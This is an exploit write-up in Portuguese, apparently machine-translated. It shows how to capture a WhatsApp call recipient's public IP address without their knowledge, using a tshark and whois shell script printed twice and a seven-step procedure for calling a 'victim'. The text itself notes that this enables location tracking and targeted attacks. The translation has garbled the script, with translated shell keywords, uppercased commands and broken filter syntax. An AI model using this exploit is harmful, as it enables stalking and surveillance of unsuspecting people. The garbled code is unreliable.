Este programa é apenas para fins educacionais. Não o use sem permissão. O aviso usual se aplica, especialmente o fato de que eu (Bhdresh) não é responsável por quaisquer danos causados pelo uso direto ou indireto da informação ou funcionalidade fornecida por esses programas. O autor ou qualquer provedor de Internet não se responsabiliza pelo conteúdo ou uso indevido desses programas ou de qualquer derivado. Ao usar este programa, você aceita o fato de que qualquer dano (Dataloss, falha no sistema, compromisso do sistema etc.) causado pelo uso desses programas não é responsabilidade da Bhdresh.
Finalmente, este é um desenvolvimento pessoal, respeite sua filosofia e não o use para coisas ruins!
https://vimeo.com/577355374
A versão mais recente do aplicativo WhatsApp em todas as plataformas é vulnerável à divulgação pública de IP do usuário do WhatsApp remoto.
Observa -se que, durante uma chamada do WhatsApp (voz / vídeo), o aplicativo no lado do chamador tenta estabelecer uma conexão direta com o endereço IP público do dispositivo destinatário. Ao filtrar os endereços IP do servidor Facebook e WhatsApp dos hosts de destino, é possível revelar o endereço IP público correto do usuário do WhatsApp de destino sem o seu conhecimento.
A seguir, um script rápido para explorar essa vulnerabilidade,
#!/bin/sh
filtro = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
eco "pressione Enter e ligue para seu alvo".
Leia a linha
TSHARK -I ETH0 -L -T FIELDS -F "UDP" -E IP.DST -Y "$ FILTER" -Y "IP.DST! ip.dst! = 172.16.0.0/12 "| Enquanto lida, linha do whois $ linha> /tmp /b
filtro = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
se ["$ filtro" -gt 0]; Então TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
ECHO $ LINE --- $ TARGENFO FI FEZ
A possibilidade de mapear os usuários do WhatsApp com seu IP público não apenas revelará as informações de localização dos usuários do WhatsApp, mas também pode ser mal utilizado para rastrear seu movimento físico, mantendo o histórico de localização. Esse mapeamento direto entre informações do usuário e IP também pode ser mal utilizado para rastrear os hábitos de surf dos usuários e influenciá -lo.
Além disso, o IP público pode ser explorado para lançar ataques direcionados à casa ou escritório do usuário do WhatsApp.
Usuários: usera é tem detalhes do whatsapp do usuáriob
Ambiente: n/a
Navegador: n/a
Versão do aplicativo: <= versão mais recente do aplicativo WhatsApp em qualquer plataforma
OS: todas as plataformas, exceto a web
Descrição: Usera faz uma chamada do WhatsApp para o Userb e captura suas informações de IP público sem o conhecimento do UserB. Vídeo POC Para uma melhor compreensão das etapas: https://vimeo.com/577355374
Etapa 1: Inicie o hotspot WiFi na máquina de atacante e conecte o telefone do atacante ao atacante SSID
Etapa 2: Inicie o script POC (abaixo) na máquina de atacante, que agora está atuando como roteador para o telefone atacante
#!/bin/sh
filtro = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
eco "pressione Enter e ligue para seu alvo".
Leia a linha
TSHARK -I ETH0 -L -T FIELDS -F "UDP" -E IP.DST -Y "$ FILTER" -Y "IP.DST! ip.dst! = 172.16.0.0/12 "| Enquanto lida, linha do whois $ linha> /tmp /b
filtro = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
se ["$ filtro" -gt 0]; Então TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
ECHO $ LINE --- $ TARGENFO FI FEZ
Etapa 3: ligue para qualquer usuário do WhatsApp aleatoriamente para capturar os endereços IP do servidor para filtrar
Etapa 4: Ligue para a vítima em seu WhatsApp
Etapa 5: desconecte a chamada uma vez estabelecida
Etapa 6: o script revelará o endereço IP público do alvo
Etapa 7: Validar o endereço IP público no telefone Target